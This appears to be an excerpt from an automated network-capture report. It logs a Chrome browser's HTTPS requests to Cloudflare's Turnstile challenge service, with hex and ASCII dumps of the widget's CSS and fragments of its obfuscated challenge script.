                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                            Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                            Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                            Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                            Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                            Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                            Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                            Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.1749729104.18.95.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:21 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f481fd4183442af&lang=auto HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: script
                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g1eg9/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:22 UTC331INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:36:22 GMT
                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                            Content-Length: 115133
                                                                            Connection: close
                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f481fdebd13c34f-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-12-19 14:36:22 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                            2024-12-19 14:36:22 UTC1369INData Raw: 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75
                                                                            Data Ascii: fresh":"Refresh","turnstile_feedback_report":"Having%20trouble%3F","testing_only":"Testing%20only.","turnstile_footer_privacy":"Privacy","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","human_button_text":"Verify%20you
                                                                            2024-12-19 14:36:22 UTC1369INData Raw: 2c 66 58 2c 66 59 2c 67 32 2c 67 33 2c 67 61 2c 67 67 2c 67 68 2c 67 48 2c 67 65 2c 67 66 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 36 30 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 35 35 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 34 31 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 39 38 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 30 37 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 36 33 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 34 39 29 29 2f 37 2b 70 61 72 73 65 49 6e 74
                                                                            Data Ascii: ,fX,fY,g2,g3,ga,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(660))/1*(-parseInt(gI(1355))/2)+parseInt(gI(1041))/3*(parseInt(gI(1598))/4)+parseInt(gI(1207))/5*(parseInt(gI(1563))/6)+-parseInt(gI(1049))/7+parseInt
                                                                            2024-12-19 14:36:22 UTC1369INData Raw: 26 28 6b 3d 7b 7d 2c 6b 5b 67 59 28 35 32 35 29 5d 3d 69 5b 67 59 28 39 31 39 29 5d 2c 6b 5b 67 59 28 31 32 33 37 29 5d 3d 6c 5b 67 59 28 32 34 33 29 5d 5b 67 59 28 35 37 33 29 5d 2c 6b 5b 67 59 28 31 30 35 31 29 5d 3d 67 59 28 31 34 37 31 29 2c 6b 5b 67 59 28 38 37 34 29 5d 3d 6d 2c 6b 5b 67 59 28 31 32 38 39 29 5d 5b 67 59 28 34 31 39 29 5d 28 6b 2c 27 2a 27 29 29 3a 28 65 4d 5b 67 59 28 33 33 36 29 5d 5b 67 59 28 31 34 32 37 29 5d 28 29 2c 65 4d 5b 67 59 28 33 33 36 29 5d 5b 67 59 28 31 31 35 38 29 5d 28 29 2c 65 4d 5b 67 59 28 34 37 30 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 67 59 28 31 32 38 39 29 5d 5b 67 59 28 34 31 39 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 67 59 28 33 39 30 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 67 59 28 32 34 33 29 5d 5b 67 59
                                                                            Data Ascii: &(k={},k[gY(525)]=i[gY(919)],k[gY(1237)]=l[gY(243)][gY(573)],k[gY(1051)]=gY(1471),k[gY(874)]=m,k[gY(1289)][gY(419)](k,'*')):(eM[gY(336)][gY(1427)](),eM[gY(336)][gY(1158)](),eM[gY(470)]=!![],eM[gY(1289)][gY(419)]({'source':gY(390),'widgetId':eM[gY(243)][gY
                                                                            2024-12-19 14:36:22 UTC1369INData Raw: 28 27 76 5f 27 2b 65 4d 5b 67 5a 28 32 34 33 29 5d 5b 67 5a 28 31 33 35 34 29 5d 2c 27 3d 27 29 2c 47 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 44 5b 67 5a 28 31 31 31 34 29 5d 3d 35 65 33 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 44 5b 67 5a 28 36 32 33 29 5d 28 43 2c 6e 2c 21 21 5b 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 6f 3d 6b 5b 67 5a 28 36 33 33 29 5d 28 69 2c 6b 5b 67 5a 28 31 33 34 33 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 6b 5b 67 5a 28 37 30 32 29 5d 28 67 5b 67 5a 28 38 37 32 29 5d 2c 45 72 72 6f 72 29 3f 67 5b 67 5a 28 38 37 32 29 5d 3d 4a 53 4f 4e 5b 67 5a 28 31 31 31 33 29 5d 28 67 5b 67 5a 28 38 37 32 29 5d 2c 4f 62 6a 65 63 74 5b 67 5a 28 39 36 32 29 5d 28 67 5b 67
                                                                            Data Ascii: ('v_'+eM[gZ(243)][gZ(1354)],'='),G));continue;case'4':D[gZ(1114)]=5e3;continue;case'5':D[gZ(623)](C,n,!![]);continue;case'6':o=k[gZ(633)](i,k[gZ(1343)]);continue;case'7':k[gZ(702)](g[gZ(872)],Error)?g[gZ(872)]=JSON[gZ(1113)](g[gZ(872)],Object[gZ(962)](g[g
                                                                            2024-12-19 14:36:22 UTC1369INData Raw: 5a 28 33 33 37 29 5d 3d 61 41 5b 67 5a 28 31 30 39 36 29 5d 7c 7c 6b 5b 67 5a 28 31 33 37 35 29 5d 2c 61 42 5b 67 5a 28 32 34 33 29 5d 5b 67 5a 28 31 39 33 29 5d 3d 61 43 5b 67 5a 28 31 35 32 37 29 5d 2c 61 44 5b 67 5a 28 32 34 33 29 5d 5b 67 5a 28 31 35 30 35 29 5d 3d 61 45 2e 63 68 7c 7c 27 27 2c 61 46 5b 67 5a 28 32 34 33 29 5d 5b 67 5a 28 33 35 39 29 5d 3d 61 47 2e 61 75 7c 7c 27 27 2c 61 48 5b 67 5a 28 32 34 33 29 5d 5b 67 5a 28 36 38 39 29 5d 3d 61 49 5b 67 5a 28 36 38 39 29 5d 7c 7c 7b 7d 2c 61 4a 5b 67 5a 28 32 34 33 29 5d 5b 67 5a 28 37 34 36 29 5d 3d 61 4b 5b 67 5a 28 31 35 37 30 29 5d 7c 7c 30 2c 61 4c 5b 67 5a 28 32 34 33 29 5d 5b 67 5a 28 31 33 30 33 29 5d 3d 61 4d 5b 67 5a 28 31 30 30 38 29 5d 7c 7c 30 2c 61 4e 5b 67 5a 28 32 34 33 29 5d 5b
                                                                            Data Ascii: Z(337)]=aA[gZ(1096)]||k[gZ(1375)],aB[gZ(243)][gZ(193)]=aC[gZ(1527)],aD[gZ(243)][gZ(1505)]=aE.ch||'',aF[gZ(243)][gZ(359)]=aG.au||'',aH[gZ(243)][gZ(689)]=aI[gZ(689)]||{},aJ[gZ(243)][gZ(746)]=aK[gZ(1570)]||0,aL[gZ(243)][gZ(1303)]=aM[gZ(1008)]||0,aN[gZ(243)][
                                                                            2024-12-19 14:36:22 UTC1369INData Raw: 3f 69 5b 68 32 28 31 33 31 32 29 5d 28 69 5b 68 32 28 34 31 32 29 5d 2c 68 32 28 31 30 36 38 29 29 3f 28 6f 3d 69 5b 68 32 28 31 34 31 37 29 5d 5b 68 32 28 38 39 34 29 5d 28 27 5c 6e 27 29 2c 69 5b 68 32 28 31 33 38 31 29 5d 28 6f 5b 68 32 28 35 34 32 29 5d 2c 31 29 29 26 26 28 73 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 76 3d 6f 5b 31 5d 5b 68 32 28 31 34 37 34 29 5d 28 73 29 2c 76 26 26 28 43 3d 76 5b 31 5d 2c 44 3d 69 5b 68 32 28 38 30 36 29 5d 28 45 2c 76 5b 32 5d 2c 31 30 29 2c 46 3d 69 5b 68 32 28 31 30 31 33 29 5d 28 47 2c 76 5b 33 5d 2c 31 30 29 29 29 3a 65 4d 5b 68 32 28 31 33 32 39 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 33 29 7b 68 33 3d 68 32 2c 65 4d 5b 68 33 28 31 31 31 35 29 5d 28 29 7d 2c 31 65
                                                                            Data Ascii: ?i[h2(1312)](i[h2(412)],h2(1068))?(o=i[h2(1417)][h2(894)]('\n'),i[h2(1381)](o[h2(542)],1))&&(s=/^\s*at\s+(.+):(\d+):(\d+)/,v=o[1][h2(1474)](s),v&&(C=v[1],D=i[h2(806)](E,v[2],10),F=i[h2(1013)](G,v[3],10))):eM[h2(1329)](function(h3){h3=h2,eM[h3(1115)]()},1e
                                                                            2024-12-19 14:36:22 UTC1369INData Raw: 5d 28 66 79 29 26 26 21 65 4d 5b 69 41 28 33 33 36 29 5d 5b 69 41 28 34 30 38 29 5d 26 26 63 5b 69 41 28 37 35 39 29 5d 28 65 2c 66 53 29 3e 64 3f 66 65 28 29 3a 66 66 28 29 7d 2c 31 65 33 29 29 2c 66 57 3d 7b 7d 2c 66 57 5b 67 4a 28 34 30 38 29 5d 3d 21 5b 5d 2c 66 57 5b 67 4a 28 31 33 35 32 29 5d 3d 65 59 2c 66 57 5b 67 4a 28 32 36 35 29 5d 3d 66 4b 2c 66 57 5b 67 4a 28 31 38 35 29 5d 3d 66 50 2c 66 57 5b 67 4a 28 31 34 34 35 29 5d 3d 66 51 2c 66 57 5b 67 4a 28 31 31 35 38 29 5d 3d 66 4c 2c 66 57 5b 67 4a 28 38 38 34 29 5d 3d 66 52 2c 66 57 5b 67 4a 28 31 31 36 31 29 5d 3d 66 4f 2c 66 57 5b 67 4a 28 31 35 36 37 29 5d 3d 66 4e 2c 66 57 5b 67 4a 28 37 30 34 29 5d 3d 66 63 2c 66 57 5b 67 4a 28 38 31 33 29 5d 3d 66 4a 2c 66 57 5b 67 4a 28 31 32 38 31 29 5d
                                                                            Data Ascii: ](fy)&&!eM[iA(336)][iA(408)]&&c[iA(759)](e,fS)>d?fe():ff()},1e3)),fW={},fW[gJ(408)]=![],fW[gJ(1352)]=eY,fW[gJ(265)]=fK,fW[gJ(185)]=fP,fW[gJ(1445)]=fQ,fW[gJ(1158)]=fL,fW[gJ(884)]=fR,fW[gJ(1161)]=fO,fW[gJ(1567)]=fN,fW[gJ(704)]=fc,fW[gJ(813)]=fJ,fW[gJ(1281)]
                                                                            2024-12-19 14:36:22 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 4a 2c 4b 2c 69 47 29 7b 72 65 74 75 72 6e 20 69 47 3d 62 2c 6f 5b 69 47 28 32 30 33 29 5d 28 4a 2c 4b 29 7d 7d 2c 6f 5b 69 48 28 31 37 32 29 5d 28 6f 5b 69 48 28 31 30 31 39 29 5d 2c 69 48 28 31 33 32 37 29 29 29 74 72 79 7b 72 65 74 75 72 6e 20 45 28 43 29 7d 63 61 74 63 68 28 4b 29 7b 72 65 74 75 72 6e 20 78 28 48 5b 69 48 28 34 35 31 29 5d 28 42 2c 43 29 29 7d 65 6c 73 65 7b 66 6f 72 28 47 5b 69 48 28 38 35 36 29 5d 28 29 2c 49 3d 30 3b 6f 5b 69 48 28 31 30 31 38 29 5d 28 49 2c 47 5b 69 48 28 35 34 32 29 5d 29 3b 6f 5b 69 48 28 31 35 30 36 29 5d 28 47 5b 49 5d 2c 47 5b 49 2b 31 5d 29 3f 47 5b 69 48 28 33 34 38 29 5d 28 49 2b 31 2c 31 29 3a 49 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41
                                                                            Data Ascii: function(J,K,iG){return iG=b,o[iG(203)](J,K)}},o[iH(172)](o[iH(1019)],iH(1327)))try{return E(C)}catch(K){return x(H[iH(451)](B,C))}else{for(G[iH(856)](),I=0;o[iH(1018)](I,G[iH(542)]);o[iH(1506)](G[I],G[I+1])?G[iH(348)](I+1,1):I+=1);return G}}(x),B='nAsAaA
                                                                            2024-12-19 14:36:22 UTC1369INData Raw: 66 3d 30 3b 32 35 36 3e 67 66 3b 67 65 5b 67 66 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 31 30 36 39 29 5d 28 67 66 29 2c 67 66 2b 2b 29 3b 67 48 3d 28 67 67 3d 28 30 2c 65 76 61 6c 29 28 67 4a 28 37 37 39 29 29 2c 67 68 3d 61 74 6f 62 28 67 4a 28 31 31 38 38 29 29 2c 66 75 6e 63 74 69 6f 6e 28 6a 4c 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 6a 4c 3d 67 4a 2c 64 3d 7b 27 6a 53 77 53 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 6d 41 70 4e 66 27 3a 6a 4c 28 31 33 34 35 29 2c 27 72 6c 78 62 76 27 3a 6a 4c 28 38 35 38 29 2c 27 4e 68 52 66 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 42 75 71 4d 48 27 3a 6a 4c 28 33 31 38 29 2c 27 55 6e 49 42 72 27 3a 66
                                                                            Data Ascii: f=0;256>gf;ge[gf]=String[gJ(1069)](gf),gf++);gH=(gg=(0,eval)(gJ(779)),gh=atob(gJ(1188)),function(jL,d,e,f,g){return jL=gJ,d={'jSwSO':function(h,i){return h!==i},'mApNf':jL(1345),'rlxbv':jL(858),'NhRfn':function(h,i){return h===i},'BuqMH':jL(318),'UnIBr':f


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.1749731104.18.95.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:22 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: image
                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g1eg9/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
